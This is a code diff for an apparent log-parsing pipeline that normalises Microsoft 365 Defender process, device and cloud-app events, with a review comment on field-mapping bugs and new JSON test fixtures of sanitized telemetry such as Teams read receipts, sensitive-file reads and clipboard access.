action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.InitiatingProcessFileSize: 
"{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + + - set: + process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}' + + - set: + process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' + filter: 
'{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}' + + set_process_deviceprocess_events: + actions: + - set: + process.parent.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" + process.parent.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" + process.parent.command_line: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.parent.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" + process.parent.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" + process.parent.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessId}}" + process.parent.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" + process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" + process.pid: "{{json_event.message.properties.ProcessId}}" + process.start: "{{json_event.message.properties.ProcessCreationTime}}" + process.name: 
"{{json_event.message.properties.FileName | basename}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine}}" + process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}" + action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" + action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" + action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" + action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" + action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" + action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" + action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" + action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + 
action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + + - set: + process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}' + + - set: + process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}' + set_alert_evidence_fields: actions: - set: @@ -356,7 +419,6 @@ stages: event.dataset: "device_events" event.category: ["host"] action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}" - action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" set_device_file_certificate_info_fields: actions: - set: 
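Review bot: `process.start` in the new `set_process_events` stage reads only `InitiatingProcessCreationTime`, while `process.pid` and `process.command_line` on the neighbouring lines still take `ProcessId`/`ProcessCommandLine` first, so for an event that carries a `ProcessId` the pid and start fields will describe two different processes. If dropping `ProcessCreationTime` here is deliberate because created-process events now go through `set_process_deviceprocess_events`, the pid and command_line lines should follow the same rule, e.g. `process.pid: "{{json_event.message.properties.InitiatingProcessId}}"`; otherwise restore the `or` fallback on `process.start`. Separately, the `process.args` filters in both stages only exclude a single trailing space: `split(" ")` on a command line whose quoted executable path contains spaces (for example a constructed `"c:\program files\x.exe" /a`) yields fragmented tokens, and a doubled space yields an empty-string argument, which makes arg-based detection rules unreliable — at least note it on those lines, e.g. `# naive whitespace split: quoted arguments containing spaces are broken into several args`. The enclosing `stages:` mapping starts and ends outside this hunk.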
@@ -469,15 +531,6 @@ stages: - set: event.dataset: "device_process_events" event.category: ["process"] - process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" - process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" - action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" - action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" - action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" - action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" - action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" - action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" - action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" set_device_registry_events_fields: actions: - set: diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json new file mode 100644 index 000000000..86f044fe7 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json 
@@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":
[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John 
DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "network" + ], + "dataset": "cloud_app_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "Application": "Microsoft Teams", + "ApplicationId": "28375", + "IsAdminOperation": "false", + "IsExternalUser": false, + "IsImpersonated": false, + "RawEventData": 
"{\"ChatThreadId\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"CommunicationType\": \"GroupChat\", \"CreationTime\": \"2024-10-28T14:18:38Z\", \"ExtraProperties\": [], \"Id\": \"abcd1234-ef09-1234-abcd-123456abcdef\", \"ItemName\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"MessageId\": \"1730125116564\", \"MessageVersion\": \"0\", \"MessageVisibilityTime\": \"2022-09-21T08:33:35Z\", \"Operation\": \"MessageReadReceiptReceived\", \"OrganizationId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"ParticipantInfo\": {\"HasForeignTenantUsers\": false, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [], \"ParticipatingSIPDomains\": [], \"ParticipatingTenantIds\": [\"12345678-abcd-ef09-1234-123456abcdef\"]}, \"RecordType\": 25, \"ResourceTenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"UserId\": \"john.doe@company.fr\", \"UserKey\": \"abcd1234-1234-1234-1234-abcdef123456\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\"}" + }, + "type": "MessageReadReceiptReceived" + }, + "microsoft": { + "defender": { + "activity": { + "objects": [ + { + "Role": "Parameter", + "ServiceObjectType": "Microsoft Team", + "Type": "Structured object" + }, + { + "ApplicationId": 11161, + "ApplicationInstance": 0, + "Id": "abcd1234-1234-1234-1234-abcdef123456", + "Name": "John DOE", + "Role": "Actor", + "Type": "User" + } + ], + "type": "Basic" + }, + "report": { + "id": "98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef" + } + } + }, + "user": { + "full_name": "John DOE" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json new file mode 100644 index 000000000..2655cb069 --- /dev/null 
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json 
@@ -0,0 +1,97 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files 
(x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": 
"05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files 
(x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + 
"info" + ] + }, + "@timestamp": "2024-11-12T10:17:24.858829Z", + "action": { + "properties": { + "AccountSid": "S-1-2-3", + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "InitiatingProcessCommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "InitiatingProcessFileSize": 3316224, + "InitiatingProcessLogonId": "5223047", + "InitiatingProcessVersionInfoCompanyName": "Test Corporation", + "InitiatingProcessVersionInfoFileDescription": "Browser EXE", + "InitiatingProcessVersionInfoInternalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoOriginalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoProductName": "Test Product", + "InitiatingProcessVersionInfoProductVersion": "1, 0, 0, 1" + }, + "type": "SensitiveFileRead" + }, + "file": { + "directory": "C:\\Log", + "name": "FileName.mdb", + "size": 286720 + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "73291" + } + } + }, + "process": { + "args": [ + "/DBMode", + "/Network", + "/ProjectID", + "/Ticket", + "0", + "0", + "12345678-1234-5678-9012-345678901234", + "123456789" + ], + "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "executable": "c:\\program files (x86)\\browser.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "browser.exe", + "parent": { + "name": "Windows.exe", + "pid": 1820, + "start": "2024-10-14T05:47:54.324381Z" + }, + "pid": 1328, + "start": "2024-11-12T10:17:23.990532Z", + "user": { + "domain": "company", + "email": "USERNAME@COMPANY.COM", + "id": "S-1-2-3", + "name": "username" + }, + "working_directory": "c:\\program files (x86)" + }, + "related": { + "hash": [ + 
"44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json similarity index 100% rename from Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json rename to Microsoft/microsoft-365-defender/tests/test_device_events_2.json diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json new file mode 100644 index 000000000..3292ed6fe --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json 
@@ -0,0 +1,81 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"File
